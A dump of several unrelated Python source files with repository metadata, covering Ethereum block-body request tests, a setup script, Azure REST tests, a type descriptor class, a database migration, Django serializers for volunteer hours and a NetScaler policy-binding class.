self.ready = not cp_cam.vl["ES_DashStatus"]["Not_Ready_Startup"]
| 37.36715
| 133
| 0.649386
|
f8941b952d9f39ea79724c163d9bd18875d87d13
| 4,935
|
py
|
Python
|
tests/trinity/core/p2p-proto/test_block_bodies_request_object.py
|
pipermerriam/py-evm
|
5a52ce035d77483577395a18f782b42ca78de77b
|
[
"MIT"
] | 137
|
2017-03-17T11:37:51.000Z
|
2022-03-07T07:51:28.000Z
|
tests/trinity/core/p2p-proto/test_block_bodies_request_object.py
|
retzger/py-evm
|
5a52ce035d77483577395a18f782b42ca78de77b
|
[
"MIT"
] | 102
|
2017-04-07T10:43:03.000Z
|
2018-11-11T18:01:56.000Z
|
tests/trinity/core/p2p-proto/test_block_bodies_request_object.py
|
retzger/py-evm
|
5a52ce035d77483577395a18f782b42ca78de77b
|
[
"MIT"
] | 39
|
2017-03-17T11:38:52.000Z
|
2021-02-18T23:05:17.000Z
|
import os
import random
import time
import pytest
import rlp
from eth_hash.auto import keccak
from eth_utils import (
to_tuple,
big_endian_to_int,
)
from eth.db.trie import make_trie_root_and_nodes
from eth.rlp.headers import BlockHeader
from eth.rlp.transactions import BaseTransactionFields
from p2p.exceptions import ValidationError
from trinity.rlp.block_body import BlockBody
from trinity.protocol.eth.requests import BlockBodiesRequest
def mk_uncle(block_number):
return BlockHeader(
state_root=os.urandom(32),
difficulty=1000000,
block_number=block_number,
gas_limit=3141592,
timestamp=int(time.time()),
)
def mk_transaction():
return BaseTransactionFields(
nonce=0,
gas=21000,
gas_price=1,
to=os.urandom(20),
value=random.randint(0, 100),
data=b'',
v=27,
r=big_endian_to_int(os.urandom(32)),
s=big_endian_to_int(os.urandom(32)),
)
def mk_header_and_body(block_number, num_transactions, num_uncles):
transactions = tuple(mk_transaction() for _ in range(num_transactions))
uncles = tuple(mk_uncle(block_number - 1) for _ in range(num_uncles))
transaction_root, trie_data = make_trie_root_and_nodes(transactions)
uncles_hash = keccak(rlp.encode(uncles))
body = BlockBody(transactions=transactions, uncles=uncles)
header = BlockHeader(
difficulty=1000000,
block_number=block_number,
gas_limit=3141592,
timestamp=int(time.time()),
transaction_root=transaction_root,
uncles_hash=uncles_hash,
)
return header, body, transaction_root, trie_data, uncles_hash
@to_tuple
def mk_headers(*counts):
for idx, (num_transactions, num_uncles) in enumerate(counts, 1):
yield mk_header_and_body(idx, num_transactions, num_uncles)
def test_block_bodies_request_empty_response_is_valid():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, _, _, _, _ = zip(*headers_bundle)
request = BlockBodiesRequest(headers)
request.validate_response(tuple(), tuple())
def test_block_bodies_request_valid_with_full_response():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, bodies, transactions_roots, trie_data_dicts, uncles_hashes = zip(*headers_bundle)
transactions_bundles = tuple(zip(transactions_roots, trie_data_dicts))
bodies_bundle = tuple(zip(bodies, transactions_bundles, uncles_hashes))
request = BlockBodiesRequest(headers)
request.validate_response(bodies, bodies_bundle)
def test_block_bodies_request_valid_with_partial_response():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, bodies, transactions_roots, trie_data_dicts, uncles_hashes = zip(*headers_bundle)
transactions_bundles = tuple(zip(transactions_roots, trie_data_dicts))
bodies_bundle = tuple(zip(bodies, transactions_bundles, uncles_hashes))
request = BlockBodiesRequest(headers)
request.validate_response(bodies[:2], bodies_bundle[:2])
request.validate_response(bodies[2:], bodies_bundle[2:])
request.validate_response(
(bodies[0], bodies[2], bodies[3]),
(bodies_bundle[0], bodies_bundle[2], bodies_bundle[3]),
)
def test_block_bodies_request_with_fully_invalid_response():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, _, _, _, _ = zip(*headers_bundle)
wrong_headers_bundle = mk_headers((3, 2), (4, 8), (1, 0), (0, 0))
w_headers, w_bodies, w_transactions_roots, w_trie_data_dicts, w_uncles_hashes = zip(
*wrong_headers_bundle
)
w_transactions_bundles = tuple(zip(w_transactions_roots, w_trie_data_dicts))
w_bodies_bundle = tuple(zip(w_bodies, w_transactions_bundles, w_uncles_hashes))
request = BlockBodiesRequest(headers)
with pytest.raises(ValidationError):
request.validate_response(w_bodies, w_bodies_bundle)
def test_block_bodies_request_with_extra_unrequested_bodies():
headers_bundle = mk_headers((2, 3), (8, 4), (0, 1), (0, 0))
headers, bodies, transactions_roots, trie_data_dicts, uncles_hashes = zip(*headers_bundle)
transactions_bundles = tuple(zip(transactions_roots, trie_data_dicts))
bodies_bundle = tuple(zip(bodies, transactions_bundles, uncles_hashes))
request = BlockBodiesRequest(headers)
wrong_headers_bundle = mk_headers((3, 2), (4, 8), (1, 0), (0, 0))
w_headers, w_bodies, w_transactions_roots, w_trie_data_dicts, w_uncles_hashes = zip(
*wrong_headers_bundle
)
w_transactions_bundles = tuple(zip(w_transactions_roots, w_trie_data_dicts))
w_bodies_bundle = tuple(zip(w_bodies, w_transactions_bundles, w_uncles_hashes))
request = BlockBodiesRequest(headers)
with pytest.raises(ValidationError):
request.validate_response(
bodies + w_bodies,
bodies_bundle + w_bodies_bundle,
)
| 34.270833
| 94
| 0.721581
|
9c8994f783b9f06bb12e5c323255fd1caa993a91
| 837
|
py
|
Python
|
setup.py
|
TauAkiou/msi-perkeyrgb
|
87c92ac23a81372a2ad604a7421bf0da6dbc4f08
|
[
"MIT"
] | 2
|
2019-10-14T18:13:12.000Z
|
2021-03-08T17:53:46.000Z
|
setup.py
|
TauAkiou/msi-perkeyrgb
|
87c92ac23a81372a2ad604a7421bf0da6dbc4f08
|
[
"MIT"
] | 1
|
2019-11-04T18:07:12.000Z
|
2019-11-04T18:07:12.000Z
|
setup.py
|
TauAkiou/msi-perkeyrgb
|
87c92ac23a81372a2ad604a7421bf0da6dbc4f08
|
[
"MIT"
] | 4
|
2019-10-25T01:38:10.000Z
|
2022-01-03T16:25:08.000Z
|
#!/usr/bin/env python
from os.path import dirname, join
from setuptools import setup
setup(
name='msi-perkeyrgb',
version='1.4-effect-alpha',
description='Configuration tool for per-key RGB keyboards on MSI laptops.',
long_description=open(
join(dirname(__file__), 'README.md')).read(),
url='https://github.com/Askannz/msi-perkeyrgb',
author='Robin Lange',
author_email='robin.langenc@gmail.com',
license='MIT',
packages=['msi_perkeyrgb'],
entry_points={
'console_scripts': [
'msi-perkeyrgb=msi_perkeyrgb.main:main',
],
},
package_data={'msi_perkeyrgb': ['presets/*.json']},
keywords=['msi', 'rgb', 'keyboard', 'per-key'],
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
)
| 28.862069
| 79
| 0.626045
|
34f80297153704881595a340a09c090274cebdb6
| 3,051
|
py
|
Python
|
sdk/core/azure-core/tests/testserver_tests/test_rest_context_manager.py
|
hugovk/azure-sdk-for-python
|
728b28b5489f46548eb8db200a49927881c282c1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/core/azure-core/tests/testserver_tests/test_rest_context_manager.py
|
hugovk/azure-sdk-for-python
|
728b28b5489f46548eb8db200a49927881c282c1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/core/azure-core/tests/testserver_tests/test_rest_context_manager.py
|
paikend/azure-sdk-for-python
|
5772d14728569fce7b40552a0f20795d12ecd797
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE.txt in the project root for
# license information.
# -------------------------------------------------------------------------
import pytest
from azure.core.rest import HttpRequest
from azure.core.exceptions import ResponseNotReadError
def test_normal_call(client, port):
def _raise_and_get_text(response):
response.raise_for_status()
assert response.text == "Hello, world!"
assert response.is_closed
request = HttpRequest("GET", url="/basic/string")
response = client.send_request(request)
_raise_and_get_text(response)
assert response.is_closed
with client.send_request(request) as response:
_raise_and_get_text(response)
response = client.send_request(request)
with response as response:
_raise_and_get_text(response)
def test_stream_call(client):
def _raise_and_get_text(response):
response.raise_for_status()
assert not response.is_closed
with pytest.raises(ResponseNotReadError):
response.text
response.read()
assert response.text == "Hello, world!"
assert response.is_closed
request = HttpRequest("GET", url="/streams/basic")
response = client.send_request(request, stream=True)
_raise_and_get_text(response)
assert response.is_closed
with client.send_request(request, stream=True) as response:
_raise_and_get_text(response)
assert response.is_closed
response = client.send_request(request, stream=True)
with response as response:
_raise_and_get_text(response)
# TODO: commenting until https://github.com/Azure/azure-sdk-for-python/issues/18086 is fixed
# def test_stream_with_error(client):
# request = HttpRequest("GET", url="/streams/error")
# with client.send_request(request, stream=True) as response:
# assert not response.is_closed
# with pytest.raises(HttpResponseError) as e:
# response.raise_for_status()
# error = e.value
# assert error.status_code == 400
# assert error.reason == "BAD REQUEST"
# assert "Operation returned an invalid status 'BAD REQUEST'" in str(error)
# with pytest.raises(ResponseNotReadError):
# error.error
# with pytest.raises(ResponseNotReadError):
# error.model
# with pytest.raises(ResponseNotReadError):
# response.json()
# with pytest.raises(ResponseNotReadError):
# response.content
# # NOW WE READ THE RESPONSE
# response.read()
# assert error.status_code == 400
# assert error.reason == "BAD REQUEST"
# assert error.error.code == "BadRequest"
# assert error.error.message == "You made a bad request"
# assert error.model.code == "BadRequest"
# assert error.error.message == "You made a bad request"
| 38.620253
| 92
| 0.647984
|
16fab29c1af07380441a4f3bb86cd75114364f72
| 4,399
|
py
|
Python
|
pip_services3_commons/reflect/TypeDescriptor.py
|
pip-services3-python/pip-services3-commons-python
|
c33cc9a04c296acf17f7e6a303dd417931559bce
|
[
"MIT"
] | null | null | null |
pip_services3_commons/reflect/TypeDescriptor.py
|
pip-services3-python/pip-services3-commons-python
|
c33cc9a04c296acf17f7e6a303dd417931559bce
|
[
"MIT"
] | null | null | null |
pip_services3_commons/reflect/TypeDescriptor.py
|
pip-services3-python/pip-services3-commons-python
|
c33cc9a04c296acf17f7e6a303dd417931559bce
|
[
"MIT"
] | 2
|
2020-03-11T21:41:13.000Z
|
2020-03-14T00:26:20.000Z
|
# -*- coding: utf-8 -*-
"""
pip_services3_commons.reflect.TypeDescriptor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Type descriptor implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
from typing import Optional, Any
from ..errors.ConfigException import ConfigException
class TypeDescriptor:
"""
    Descriptor that points to a specific object type by its name
and optional library (or module) where this type is defined.
This class has symmetric implementation across all languages supported
by Pip.Services toolkit and used to support dynamic data processing.
"""
def __init__(self, name: str, library: Optional[str]):
"""
Creates a new instance of the type descriptor and sets its values.
:param name: a name of the object type.
:param library: a library or module where this object type is implemented.
"""
self.__name: str = name
self.__library: str = library
def get_name(self) -> str:
"""
Get the name of the object type.
:return: the name of the object type.
"""
return self.__name
def get_library(self) -> str:
"""
Gets the name of the library or module where the object type is defined.
:return: the name of the library or module.
"""
return self.__library
def __eq__(self, other: Any) -> bool:
"""
        Compares this descriptor to a value.
        If the value is also a TypeDescriptor it compares their name and library fields.
        Otherwise this method returns false.
        :param other: a value to compare.
        :return: true if the value is an identical TypeDescriptor and false otherwise.
"""
if isinstance(other, TypeDescriptor):
if self.__name is None or other.__name is None:
return False
if self.__name != other.__name:
return False
if self.__library is None or other.__library is None or self.__library == other.__library:
return True
return False
def equals(self, other: Any) -> bool:
"""
        Compares this descriptor to a value.
        If the value is also a TypeDescriptor it compares their name and library fields.
        Otherwise this method returns false.
        :param other: a value to compare.
        :return: true if the value is an identical TypeDescriptor and false otherwise.
"""
if isinstance(other, TypeDescriptor):
if self.__name is None or other.__name is None:
return False
if self.__name != other.__name:
return False
if self.__library is None or other.__library is None or self.__library == other.__library:
return True
return False
def __str__(self):
"""
Gets a string representation of the object. The result has format name[,library]
:return: a string representation of the object.
"""
result = self.__name
if not (self.__library is None):
result += ',' + self.__library
return result
def to_string(self):
"""
Gets a string representation of the object. The result has format name[,library]
:return: a string representation of the object.
"""
result = self.__name
if not (self.__library is None):
result += ',' + self.__library
return result
@staticmethod
def from_string(value: str) -> Optional['TypeDescriptor']:
"""
Parses a string to get descriptor fields and returns them as a Descriptor.
The string must have format name[,library]
:param value: a string to parse.
:return: a newly created Descriptor.
"""
if value is None or len(value) == 0:
return None
tokens = value.split(",")
if len(tokens) == 1:
return TypeDescriptor(tokens[0].strip(), None)
elif len(tokens) == 2:
return TypeDescriptor(tokens[0].strip(), tokens[1].strip())
else:
raise ConfigException(
None, "BAD_DESCRIPTOR", "Type descriptor " + value + " is in wrong format"
).with_details("descriptor", value)
| 32.345588
| 102
| 0.60241
|
16f131405a0b2a5566dafa2d3d59f7d7c8fe9cea
| 1,256
|
py
|
Python
|
migrations/versions/9005ab594598_add_lettertemplates.py
|
CityOfNewYork/NYCOpenRecords
|
476a236a573e6f3a2f96c6537a30ee27b2bd3a2b
|
[
"Apache-2.0"
] | 37
|
2016-01-21T18:33:56.000Z
|
2021-10-24T01:43:20.000Z
|
migrations/versions/9005ab594598_add_lettertemplates.py
|
CityOfNewYork/NYCOpenRecords
|
476a236a573e6f3a2f96c6537a30ee27b2bd3a2b
|
[
"Apache-2.0"
] | 179
|
2016-01-21T21:33:31.000Z
|
2022-02-15T21:31:35.000Z
|
migrations/versions/9005ab594598_add_lettertemplates.py
|
CityOfNewYork/NYCOpenRecords
|
476a236a573e6f3a2f96c6537a30ee27b2bd3a2b
|
[
"Apache-2.0"
] | 13
|
2017-05-19T17:27:31.000Z
|
2020-07-05T00:55:29.000Z
|
"""Add LetterTemplates
Revision ID: 9005ab594598
Revises: 949aebe9e480
Create Date: 2018-03-20 18:41:57.143317
"""
# revision identifiers, used by Alembic.
revision = "9005ab594598"
down_revision = "949aebe9e480"
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table(
"letter_templates",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column(
"type",
sa.Enum(
"acknowledgment",
"extension",
"closing",
"denial",
"re-opening",
"letters",
name="letter_type",
),
nullable=False,
),
sa.Column("agency_ein", sa.String(length=4), nullable=True),
sa.Column("title", sa.String(), nullable=False),
sa.Column("content", sa.String(), nullable=False),
sa.ForeignKeyConstraint(["agency_ein"], ["agencies.ein"]),
sa.PrimaryKeyConstraint("id"),
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table("letter_templates")
### end Alembic commands ###
| 26.166667
| 68
| 0.57086
|
b80ab44034babe45940c7556f292d6d5ad26955c
| 423
|
py
|
Python
|
users/admin.py
|
uoe-compsci-grp30/campusgame
|
d2d7ba99210f352a7b45a1db06cea0a09e3b8c31
|
[
"MIT"
] | null | null | null |
users/admin.py
|
uoe-compsci-grp30/campusgame
|
d2d7ba99210f352a7b45a1db06cea0a09e3b8c31
|
[
"MIT"
] | null | null | null |
users/admin.py
|
uoe-compsci-grp30/campusgame
|
d2d7ba99210f352a7b45a1db06cea0a09e3b8c31
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import gettext_lazy
from users.models import User, GameParticipation
# Register your models here.
class MUserAdmin(UserAdmin):
fieldsets = UserAdmin.fieldsets + ((gettext_lazy("Zones stuff"), {"fields": ("is_gamekeeper",)}),)
admin.site.register(User, MUserAdmin)
admin.site.register(GameParticipation)
| 28.2
| 102
| 0.789598
|
68b37a20c7f0856430903101ba71b51173953264
| 2,304
|
py
|
Python
|
tests/sdk/query/test_top.py
|
ObliviousAI/smartnoise-sdk
|
6c5b9bdd16852a08ee01299193a1fac93def99cd
|
[
"MIT"
] | null | null | null |
tests/sdk/query/test_top.py
|
ObliviousAI/smartnoise-sdk
|
6c5b9bdd16852a08ee01299193a1fac93def99cd
|
[
"MIT"
] | null | null | null |
tests/sdk/query/test_top.py
|
ObliviousAI/smartnoise-sdk
|
6c5b9bdd16852a08ee01299193a1fac93def99cd
|
[
"MIT"
] | null | null | null |
import os
import subprocess
import copy
import pytest
import pandas as pd
from pandasql import sqldf
import math
from opendp.smartnoise.metadata import CollectionMetadata
from opendp.smartnoise.sql import PrivateReader, PandasReader
from opendp.smartnoise.sql.parse import QueryParser
git_root_dir = subprocess.check_output("git rev-parse --show-toplevel".split(" ")).decode("utf-8").strip()
meta_path = os.path.join(git_root_dir, os.path.join("datasets", "PUMS.yaml"))
csv_path = os.path.join(git_root_dir, os.path.join("datasets", "PUMS.csv"))
class TestTopAndLimit:
def setup_class(cls):
meta = CollectionMetadata.from_file(meta_path)
meta["PUMS.PUMS"].censor_dims = False
df = pd.read_csv(csv_path)
reader = PandasReader(df, meta)
private_reader = PrivateReader(reader, meta, 10.0, 10E-3)
cls.reader = private_reader
def test_queries(self):
reader = self.reader
query = 'SELECT TOP 20 age, married, COUNT(*) AS n, SUM(income) AS income FROM PUMS.PUMS GROUP BY age, married ORDER BY married, age DESC'
res = reader.execute(query)
assert len(res) == 21
query = 'SELECT age, married, COUNT(*) AS n, SUM(income) AS income FROM PUMS.PUMS GROUP BY age, married ORDER BY married, age DESC LIMIT 10'
res = reader.execute(query)
assert len(res) == 11
# run the same query with exact reader. Since ORDER BY is
# on non-private dimension, order will be the same
res_e = reader.reader.execute(query)
assert len(res_e) == 11
ages = [r[0] for r in res[1:]]
ages_e = [r[0] for r in res_e[1:]]
assert all([age == age_e for (age, age_e) in zip(ages, ages_e)])
query = 'SELECT age, married, COUNT(*) AS n, SUM(income) AS income FROM PUMS.PUMS GROUP BY age, married ORDER BY income DESC LIMIT 50'
res = reader.execute(query)
assert len(res) == 51
        # run the same query with exact reader. Since ORDER BY is
        # on the noisy SUM(income) aggregate, order will be different
res_e = reader.reader.execute(query)
assert len(res_e) == 51
ages = [r[0] for r in res[1:]]
ages_e = [r[0] for r in res_e[1:]]
assert not all([age == age_e for (age, age_e) in zip(ages, ages_e)])
| 40.421053
| 148
| 0.656684
|
b8353f160841dcf1ab28bbaefd491cdeab4bd309
| 6,623
|
py
|
Python
|
api/logistics/serializers.py
|
abhinavtripathy/Volog
|
8b4eb02b18bfc6d8689def9b9037325ccd3d871e
|
[
"MIT"
] | null | null | null |
api/logistics/serializers.py
|
abhinavtripathy/Volog
|
8b4eb02b18bfc6d8689def9b9037325ccd3d871e
|
[
"MIT"
] | null | null | null |
api/logistics/serializers.py
|
abhinavtripathy/Volog
|
8b4eb02b18bfc6d8689def9b9037325ccd3d871e
|
[
"MIT"
] | null | null | null |
"""
File Name: Serializers
Purpose: Serializers for translating database data before sending it over the API.
Comments:
"""
from django.db.models import Sum
from rest_framework import serializers
from rest_framework.fields import empty
from api.models import BugReport, FeedbackForm
from api.models import Student, Mentor, HourInstance, Group, StudentGroup, ActivityCategory
from auth_backend.modules.user.serializers import UserSerializer
class MentorSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
class Meta:
model = Mentor
fields = ['id', 'user']
class StudentSerializer(serializers.ModelSerializer):
user = UserSerializer(many=False, read_only=True)
pending_hour = serializers.SerializerMethodField()
approved_hour = serializers.SerializerMethodField()
def get_pending_hour(self, obj):
hours = HourInstance.objects.filter(student=obj)
pending = hours.filter(approval_status='PENDING').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
pending_hours = pending['number_of_hours__sum'] if pending['number_of_hours__sum'] else 0 + pending[
'number_of_minutes__sum'] / 60 if pending['number_of_minutes__sum'] else 0
pending_minutes = pending['number_of_minutes__sum'] % 60 if pending['number_of_minutes__sum'] else 0
return pending_hours + pending_minutes / 60
def get_approved_hour(self, obj):
hours = HourInstance.objects.filter(student=obj)
approved = hours.filter(approval_status='APPROVED').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
approved_hours = approved['number_of_hours__sum'] if approved['number_of_hours__sum'] else 0 + approved[
'number_of_minutes__sum'] / 60 if approved['number_of_minutes__sum'] else 0
        approved_minutes = approved['number_of_minutes__sum'] % 60 if approved['number_of_minutes__sum'] else 0
        return approved_hours + approved_minutes / 60
class Meta:
model = Student
fields = ['id', 'user', 'student_id', 'class_standing', 'pending_hour', 'approved_hour']
class ActivityCategorySerializer(serializers.ModelSerializer):
class Meta:
model = ActivityCategory
fields = ['title']
class HourSerializer(serializers.ModelSerializer):
def __init__(self, instance=None, data=empty, pk=None, **kwargs):
super().__init__(instance, data, **kwargs)
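        # Use nested representations (depth=1) for read requests only; writes keep plain primary-key fields.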
if kwargs['context']['request'].method == 'GET':
setattr(self.Meta, 'depth', 1)
else:
setattr(self.Meta, 'depth', 0)
class Meta:
model = HourInstance
fields = ['id', 'student', 'date_of_activity', 'number_of_hours', 'number_of_minutes', 'activity_description',
'activity_category', 'type_of_hour', 'learning_goal', 'approved', 'mentor_comment', 'approval_status']
depth = 1
class GroupSerializer(serializers.ModelSerializer):
"""Group Serializer"""
students = serializers.PrimaryKeyRelatedField(
queryset=Student.objects.all(), many=True
)
mentor_detail = MentorSerializer(source='mentor', read_only=True)
pending_hour = serializers.SerializerMethodField()
approved_hour = serializers.SerializerMethodField()
def get_pending_hour(self, obj):
hours = HourInstance.objects.filter(student__in=obj.students.all())
pending = hours.filter(approval_status='PENDING').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
        # aggregate() returns None for empty querysets, so fall back to 0 before combining.
        pending_hours = pending['number_of_hours__sum'] or 0
        pending_minutes = pending['number_of_minutes__sum'] or 0
        return pending_hours + pending_minutes / 60
def get_approved_hour(self, obj):
hours = HourInstance.objects.filter(student__in=obj.students.all())
approved = hours.filter(approval_status='APPROVED').aggregate(Sum('number_of_hours'), Sum('number_of_minutes'))
        # aggregate() returns None for empty querysets, so fall back to 0 before combining.
        approved_hours = approved['number_of_hours__sum'] or 0
        approved_minutes = approved['number_of_minutes__sum'] or 0
        return approved_hours + approved_minutes / 60
class Meta:
model = Group
fields = ('id', 'name', 'mentor', 'students', 'created_at', 'mentor_detail', 'pending_hour', 'approved_hour')
def create(self, validated_data):
students = validated_data.pop('students', [])
group = Group.objects.create(**validated_data)
student_list = [
StudentGroup(
student=student,
group=group
) for student in students
]
StudentGroup.objects.bulk_create(student_list)
return group
def update(self, instance, validated_data):
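        # Group membership is replaced wholesale: drop the existing StudentGroup rows, then bulk-create the new set.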
StudentGroup.objects.filter(group=instance).delete()
students = validated_data.pop('students', [])
student_list = [
StudentGroup(
student=student,
group=instance
) for student in students
]
instance.mentor = validated_data['mentor']
instance.name = validated_data['name']
StudentGroup.objects.bulk_create(student_list)
instance.save()
return instance
class StudentGroupSerializer(serializers.ModelSerializer):
student_id = serializers.PrimaryKeyRelatedField(
queryset=Student.objects.all(), source='student', write_only=True
)
group_id = serializers.PrimaryKeyRelatedField(
queryset=Group.objects.all(), source='group', write_only=True
)
student = StudentSerializer(read_only=True)
class Meta:
model = StudentGroup
fields = ('student', 'group', 'student_id', 'group_id',)
read_only_fields = ('group',)
def create(self, validated_data):
instance = super().create(validated_data)
return instance
def update(self, instance, validated_data):
user_group_instance = super(StudentGroupSerializer, self).update(
instance, validated_data
)
return user_group_instance
class FeedbackFormSerializer(serializers.ModelSerializer):
class Meta:
model = FeedbackForm
exclude = []
class BugReportSerializer(serializers.ModelSerializer):
class Meta:
model = BugReport
exclude = []
| 40.882716
| 120
| 0.691831
|
4b79104da37498b8b3a326ff8c89df6d7f52dbfa
| 6,368
|
py
|
Python
|
nssrc/com/citrix/netscaler/nitro/resource/config/cs/cspolicy_cspolicylabel_binding.py
|
mahabs/nitro
|
be74e1e177f5c205c16126bc9b023f2348788409
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/config/cs/cspolicy_cspolicylabel_binding.py
|
mahabs/nitro
|
be74e1e177f5c205c16126bc9b023f2348788409
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/config/cs/cspolicy_cspolicylabel_binding.py
|
mahabs/nitro
|
be74e1e177f5c205c16126bc9b023f2348788409
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cspolicy_cspolicylabel_binding(base_resource) :
""" Binding class showing the cspolicylabel that can be bound to cspolicy.
"""
def __init__(self) :
self._domain = ""
self._url = ""
self._priority = 0
self._hits = 0
self._labeltype = ""
self._labelname = ""
self._policyname = ""
self.___count = 0
@property
def policyname(self) :
"""Name of the content switching policy to display. If this parameter is omitted, details of all the policies are displayed.<br/>Minimum length = 1.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
"""Name of the content switching policy to display. If this parameter is omitted, details of all the policies are displayed.<br/>Minimum length = 1
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def domain(self) :
"""The domain name. The string value can range to 63 characters.<br/>Minimum length = 1.
"""
try :
return self._domain
except Exception as e:
raise e
@domain.setter
def domain(self, domain) :
"""The domain name. The string value can range to 63 characters.<br/>Minimum length = 1
"""
try :
self._domain = domain
except Exception as e:
raise e
@property
def priority(self) :
"""priority of bound policy.
"""
try :
return self._priority
except Exception as e:
raise e
@property
def labelname(self) :
"""Name of the label invoked.
"""
try :
return self._labelname
except Exception as e:
raise e
@property
def hits(self) :
"""Total number of hits.
"""
try :
return self._hits
except Exception as e:
raise e
@property
def url(self) :
"""URL string that is matched with the URL of a request. Can contain a wildcard character. Specify the string value in the following format: [[prefix] [*]] [.suffix].<br/>Minimum length = 1<br/>Maximum length = 208.
"""
try :
return self._url
except Exception as e:
raise e
@property
def labeltype(self) :
"""The invocation type.<br/>Possible values = reqvserver, resvserver, policylabel.
"""
try :
return self._labeltype
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cspolicy_cspolicylabel_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cspolicy_cspolicylabel_binding
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.policyname) :
return str(self.policyname)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, policyname) :
""" Use this API to fetch cspolicy_cspolicylabel_binding resources.
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, policyname, filter_) :
""" Use this API to fetch filtered set of cspolicy_cspolicylabel_binding resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, policyname) :
""" Use this API to count cspolicy_cspolicylabel_binding resources configued on NetScaler.
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, policyname, filter_) :
""" Use this API to count the filtered set of cspolicy_cspolicylabel_binding resources.
		Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = cspolicy_cspolicylabel_binding()
obj.policyname = policyname
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class cspolicy_cspolicylabel_binding_response(base_response) :
def __init__(self, length=1) :
self.cspolicy_cspolicylabel_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cspolicy_cspolicylabel_binding = [cspolicy_cspolicylabel_binding() for _ in range(length)]
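# Editor-added illustrative sketch (not part of the original module). It assumes `service` is an
# already-authenticated nitro_service session and that a content switching policy named
# "my_cs_policy" exists; both are hypothetical here, so the example is left as comments.
#
#   bindings = cspolicy_cspolicylabel_binding.get(service, "my_cs_policy")
#   for binding in bindings:
#       print(binding.labelname, binding.labeltype, binding.priority, binding.hits)
#   total = cspolicy_cspolicylabel_binding.count(service, "my_cs_policy")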
| 28.684685
| 219
| 0.718593
|
a85eabb40740dd9e3ea8c93f8345887ee8867fdd
| 167
|
py
|
Python
|
lecture_5/07/typing2.py
|
darinabird/python_developer
|
7141c9e4d0deb5f2943d70eaf189316631942e56
|
[
"CC0-1.0"
] | 20
|
2020-03-04T17:26:47.000Z
|
2022-03-27T20:47:37.000Z
|
lecture_5/07/typing2.py
|
darinabird/python_developer
|
7141c9e4d0deb5f2943d70eaf189316631942e56
|
[
"CC0-1.0"
] | 3
|
2020-03-17T17:39:36.000Z
|
2020-03-31T16:01:23.000Z
|
